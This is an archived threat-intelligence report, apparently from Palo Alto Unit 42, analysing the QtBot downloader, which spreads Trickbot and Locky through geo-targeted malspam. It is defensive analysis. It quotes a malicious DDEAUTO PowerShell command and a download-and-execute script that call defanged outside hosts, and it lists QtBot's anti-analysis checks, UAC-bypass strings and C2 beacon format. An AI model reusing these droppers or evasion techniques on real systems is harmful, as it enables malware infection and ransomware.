{
	"id": "331f999e-f3d1-4db9-9093-452900471f04",
	"created_at": "2026-04-06T00:11:00.977581Z",
	"updated_at": "2026-04-10T13:12:39.957387Z",
	"deleted_at": null,
	"sha1_hash": "1e833c423ac4022d808878fcd826829144ad92cc",
	"title": "Everybody Gets One: QtBot Used to Distribute Trickbot and Locky",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1935667,
	"plain_text": "Everybody Gets One: QtBot Used to Distribute Trickbot and Locky\r\nBy Brandon Levene, Brandon Young, Dominik Reichel\r\nPublished: 2017-11-01 · Archived: 2026-04-02 12:32:18 UTC\r\nIntroduction\r\nThe most common Locky and Trickbot affiliates are being distributed via shared malspam campaigns. Unit 42 and external malware researchers believe the payloads are geo-targeted. Previously, geo-targeting was controlled by a relatively simplistic VBA script which utilized GeoIP lookup services and parsed the country code to determine the compromised host’s location. With this information, the VBA script would enter a loop checking for the presence of the country codes: UK, IE, AU, GB, LU, or BE and, if any of those country codes was present, URIs to serve Trickbot were selected for download and execution. If this check failed, Locky would be served instead.\r\nRecently, Unit 42 researcher Brad Duncan observed Necurs malspam campaigns distributing Microsoft Office documents that were abusing DDE. These documents load an intermediate downloader which we have tagged in AutoFocus as “QtBot”. QtBot replaces the previously discussed VBA and features a robust anti-analysis suite to protect itself. This new downloader is responsible for loading the final payload, either Locky or Trickbot, again based on GeoIP. Palo Alto Networks has observed more than 4 million unique sessions with QtBot activity since October 19th, 2017.\r\nThe Lure\r\nThe malicious DDE documents are included as attachments to malspam lures like the one below (seen 10/24/2017):\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 1 of 14\n\nFigure 1. Shows an example email lure with a malicious document that uses DDE to deliver a payload.\r\nTypically, these lures are very simple. 
Most of the observed lures fall either within the “Financial Statement” category (Invoice, Billing, Receipt) or the “File Transfer” category (efax, file scan). This campaign relies on the user to download the attachment, open it, and click through several dialog boxes. The attached document, bb92218314ffdc450320f1d44d8a2fe163c585827d9ca3e9a00cb2ea0e27f0c9, contains the following DDE object:\r\n[URL Defanged]\r\nDDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe \"/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader((([Net.WebRequest]::Create('hXXp://burka.ch/JHhdg33')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr\"\r\nNetwork Traffic\r\nLet’s examine the network traffic. Immediately following the user’s click-throughs of three dialog boxes, the following HTTP GET request is issued. Interestingly, it’s likely this initial command and control server is simply a compromised web host running a vulnerable version of PLESK, as can be seen from the X-Powered-By header in the HTTP response.\r\nFigure 2. DDE downloads a base64 blob for execution. 
Also, an interesting note: this initial server hosting the scriptlet is using PLESK and is likely compromised.\r\nThe base64 blob decodes to the following [URLs defanged]:\r\n$urls = \"hXXp://aurea-art[.]ru/incrHG32\",\"hXXp://castellodimontegioco[.]com/incrHG32\",\"hXXp://nl.flipcapella[.]com/incrHG32\",\"hXXp://dotecnia[.]cl/incrHG32\",\"hXXp://christakranzl[.]at/incrHG32\"\r\nforeach($url in $urls){\r\n    Try\r\n    {\r\n        Write-Host $url\r\n        $fp = \"$env:temp\\theyweare64.exe\"\r\n        Write-Host $fp\r\n        $wc = New-Object System.Net.WebClient\r\n        $wc.DownloadFile($url, $fp)\r\n        Start-Process $fp\r\n        break\r\n    }\r\n    Catch\r\n    {\r\n        Write-Host $_.Exception.Message\r\n    }\r\n}\r\nThe entire list is iterated over until a valid download location is found (this can be observed in the cmd.exe window which is spawned in the background by the initial DDE execution). Once a live command and control server responds, the QtBot binary (798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120) is downloaded in the clear.\r\nFigure 3. Download of the QtBot downloader, with the executable in the clear. Note that the Content-Type doesn’t match.\r\nOnce the QtBot binary has been downloaded, it’s executed from the user’s %temp% directory using the PowerShell Start-Process cmdlet, which can be seen in the decoded base64 blob included in the code block above. 
When QtBot is started, it initially performs a connectivity check to the legitimate domain, ds.download.windowsupdate[.]com, via an HTTP POST request.\r\nFigure 4. Downloader component issues a request to an innocuous domain as a connectivity check.\r\nFinally, once the connectivity check passes, QtBot will beacon back to its command and control server using an HTTP POST request with an RC4-encrypted payload and await a response which is encrypted with the same RC4 key. The User-Agent “Windows-Update-Agent” is identical across the connectivity check, the initial check-in, and the final payload delivery.\r\nFor the network traffic below, we will use the QtBot sample d97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2, as at the time of analysis the command and control server was still live and serving geo-specific payloads.\r\nIn cases where the geolocation matches a set list (we believe this list is likely identical to the one in the earlier VBA discussed in the Introduction section), we will see the traffic below.\r\nFigure 5. The downloader Trojan posts data back to the command and control server. This likely determines geolocation-based targeting; this request led to the download of Trickbot as we used a UK-based exit point. The Trickbot download can be seen in Figure 6. Note the User-Agent header is identical to that of the connectivity check in Figure 4.\r\nDue to the host being within the UK, we received an encrypted Trickbot payload. 
The decrypted Trickbot observed in the request below is 4fcee2679cc65585cc1c1c7baa020ec262a2b7fb9b8dc7529a8f73fab029afad.\r\nFigure 6. Payload downloaded by the intermediate downloader. In this case, Trickbot.\r\nIn the following figures, we see a host POST data back to the C2 and receive a slightly different response. This is because the host is in a location not specifically targeted for Trickbot delivery. Thus, we expect to see a different download location and likely a Locky payload.\r\nFigure 7. The downloader Trojan posts data back to the command and control server. This likely determines geolocation-based targeting; this request led to the download of Locky as we used a CA-based exit point. The Locky download can be seen in Figure 8.\r\nBelow we see a different payload from a different location due to the server’s response. In this case the payload is an encrypted Locky binary. The decrypted binary is 9d2ce15fd9112d52fa09c543527ef0b5bf07eb4c07794931c5768e403c167d49.\r\nFigure 8. Payload downloaded by the intermediate downloader. In this case, Locky.\r\nWith the network behavior laid out from initial execution to payload delivery, let’s take a closer look at the intermediate downloader, QtBot.\r\nQtBot Analysis\r\nThe QtBot downloader is a Windows executable file that decrypts an importless stub into memory. This payload is later injected into msiexec.exe using common techniques. The payload then decrypts the second-stage shellcode and injects it into a newly spawned svchost.exe process. 
This svchost.exe acts as the handler for the final payload.\r\nWhen QtBot initially executes, a new thread is created which is responsible for process scanning. This process scanning is used to identify analysis tools and, if any are found, terminate the malware’s further execution. This check is periodically repeated on a loop. Process hashes are calculated by lowercasing the process name, calculating the CRC32 of the result, and XORing the CRC32 value with 0x2e5d47c8. The XOR value appears to change on a regular basis, thus the hashes below only apply to 798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120. The following hash values are checked against running processes:\r\n0x171AF567\r\n0xB713B22E\r\n0x59F3573F - wireshark.exe\r\n0xA9275283 - peid.exe\r\n0x2C533BA3\r\n0xB1FDD418 - x64dbg.exe\r\n0xA7B71C08\r\n0x5BBA66D5\r\n0xFD62D761\r\n0xB01C9DA9 - cff explorer.exe\r\n0xE7AC4C20\r\n0x8718A391 - procexp.exe\r\n0x817D523A - ollydbg.exe\r\n0x9A65393D - lordpe.exe\r\n0x4B1B38C6 - processhacker.exe\r\n0xBD46C402\r\n0x72472F0B - tcpview.exe\r\n0x151648CD\r\n0x4A694A06 - vboxservice.exe\r\n0x956511A3 - sbiesvc.exe\r\n0x09D19890 - vmtoolsd.exe\r\n0x70383CD2\r\n0x40C795F0 - petools.exe\r\n0x6D2607D8 - exeinfope.exe\r\n0x4D9803BC - vboxtray.exe\r\n0x29FBEE3C - windbg.exe\r\n0x0872D0FC\r\n0x28F7E9A8 - idaq.exe\r\n0x3D0598D0 - x32dbg.exe\r\n0x1D141E5D\r\n0xFCB2810C - python.exe\r\n0x2AA827DB\r\n0xCA9B2CDE\r\n0x75F4F636 - procmon.exe\r\nThe payload then creates a randomly generated 
numerical mutex along with the registry key “HKCU\\Software\\QtProject”. This registry key has been used in the past by legitimate Qt framework software and should not strictly be considered malicious on its own.\r\nOnce the mutex and registry string are created, the malware uses RC4 with a hardcoded key to decrypt numerous strings, which are reproduced below (note these strings are from 798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120):\r\ncmd.exe\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\r\nboom\r\nhttp://toundlefa[.]net/\r\nSoftware\\QtProject\r\nmsiexec.exe\r\nsvchost.exe\r\n/c start %s \u0026\u0026 exit\r\ncmd.exe\r\n\\System32\\CompMgmtLauncher.exe\r\nrunas\r\nSoftware\\Classes\\mscfile\r\n\\shell\\open\\command\r\ntmp_file\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\r\n\\Policies\\Explorer\r\n\\Run\r\nCheck Update\r\nPOST\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nDZCW\r\n6VK3\r\nregsvr32.exe\r\nhttp://ds.download.windowsupdate.com/\r\n{\"rep\":0,\"bid\":\"%s\",\"ver\":%d,\"cam\":\"%s\",\"cis\":%d,\"lvl\":%d,\"adm\":%d,\"bit\":%d,\"osv\":%d,\"osb\":%d,\"tmt\":%d}\r\n{\"rep\":1,\"bid\":\"%s\",\"tid\":\"%s\",\"res\":%d}\r\nThe hardcoded RC4 key, 0x7A3C5B7CB7FCE715702AA0F4F4EC0935E759FD3B7B6BCC70159D61CF42814B81, is reused throughout this campaign to encrypt and decrypt network communications.\r\nQtBot includes a function which checks for the keyboard layouts common to former USSR countries; if any are found, execution is terminated. This routine is shown below:\r\nFigure 9. 
Keyboard layout checks in order to prevent infection of former USSR countries.\r\nFor persistence, a temp file is generated with a randomly generated name and stored in %APPDATA%\\Local\\Temp\\ in a randomly named folder.\r\nThis randomly generated value is used for the folder name and is stored in the registry key “HKCU\\Software\\QtProject” in the value “0FAD2D5E”. The malware stores additional encrypted data in this key:\r\n“0FAD2D5E” – Random Value + Unicode temp file name + length of data blob\r\n“0FAD2D5EDZCW” – RC4 Encrypted C2 Domain\r\nSuccessful malware communications use a format string like the one below:\r\n{\"rep\":0,\"bid\":\"%s\",\"ver\":%d,\"cam\":\"%s\",\"cis\":%d,\"lvl\":%d,\"adm\":%d,\"bit\":%d,\"osv\":%d,\"osb\":%d,\"tmt\":%d}\r\nWhen this is filled in, it would look similar to the following:\r\n{\"rep\":0,\"bid\":\"LD0fJMblnCbrDT8Mvma4Rg==\",\"ver\":256,\"cam\":\"nightboom\",\"cis\":0,\"lvl\":12288,\"adm\":1,\"bit\":1,\"osv\":1537,\"osb\":7601,\"tmt\":30}\r\nSome of these values are unknown, though we are able to speculate on the nature of their meanings. We believe they are as follows:\r\n\"rep\" – communication attempt repetitions from a single host\r\n\"bid\" – binary identification; this value is stored in registry value \"0FAD2D5E\" and is RC4 encrypted and base64 encoded before sending\r\n\"ver\" – likely versioning information\r\n\"cam\" – campaign name\r\n\"cis\" – unknown hardcoded value\r\n\"lvl\" – system integrity level\r\n\"adm\" – if the malware has administrative privileges\r\n\"bit\" – unknown\r\n\"osv\" – operating system version\r\n\"osb\" – operating system build\r\n\"tmt\" – timeout in seconds\r\nSimilarities to Andromeda\r\nExisting analysis of the Andromeda loader and bot reveals some commonalities between Andromeda and QtBot. 
The most apparent similarities of these two families are the running process hash check used for anti-analysis, host infection denylisting based on language identifiers returned from GetKeyboardLayout, separate infection and task reports for C2 reporting, and the code injection target, msiexec.exe. At this time, due to the seemingly major updates to the base Andromeda, which is still active, we are referring to this particular family as a new entity and have created a separate identifier in AutoFocus, QtBot, to help users differentiate.\r\nConclusion\r\nWhile geographic-location-specific malware delivery is not a new phenomenon, the combination of two previously disparate malware family affiliates utilizing unified malspam campaigns and droppers is an interesting shift in tactics. QtBot protects itself and the decision tree by which targeting is established, and offers a significantly more robust anti-analysis package to stymie analysts.\r\nPalo Alto Networks has observed more than 4 million unique sessions with QtBot behaviors, which can be seen with the QtBot tag in AutoFocus. 
Customers using WildFire are protected from this threat.\r\nPalo Alto Networks would like to thank researchers at Proofpoint, who identify this threat as \"QtLoader\", for first bringing these campaigns to our attention.\r\nIOCs\r\n798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120 – QtBot\r\nd97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2 – QtBot used for payload differentiation screenshots\r\nbb92218314ffdc450320f1d44d8a2fe163c585827d9ca3e9a00cb2ea0e27f0c9 – DDE Dropper\r\n9d2ce15fd9112d52fa09c543527ef0b5bf07eb4c07794931c5768e403c167d49 – Locky\r\n4fcee2679cc65585cc1c1c7baa020ec262a2b7fb9b8dc7529a8f73fab029afad – Trickbot\r\nhXXp://hobystube[.]net – Locky Download Location\r\nhXXp://kengray[.]com – Trickbot Download Location\r\nhXXp://fetchstats[.]net – QtBot C2\r\nhXXp://toundlefa[.]net – QtBot C2\r\nhXXp://aurea-art[.]ru/incrHG32\r\nhXXp://castellodimontegioco[.]com/incrHG32\r\nhXXp://nl.flipcapella[.]com/incrHG32\r\nhXXp://dotecnia[.]cl/incrHG32\r\nhXXp://christakranzl[.]at/incrHG32\r\nhXXp://burka[.]ch/JHhdg33\r\nhXXp://celebrityonline[.]cz – URI varies based on payload\r\nSource: https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
	],
	"report_names": [
		"unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky"
	],
	"threat_actors": [],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.pdf",
		"text": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.txt",
		"img": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.jpg"
	}
}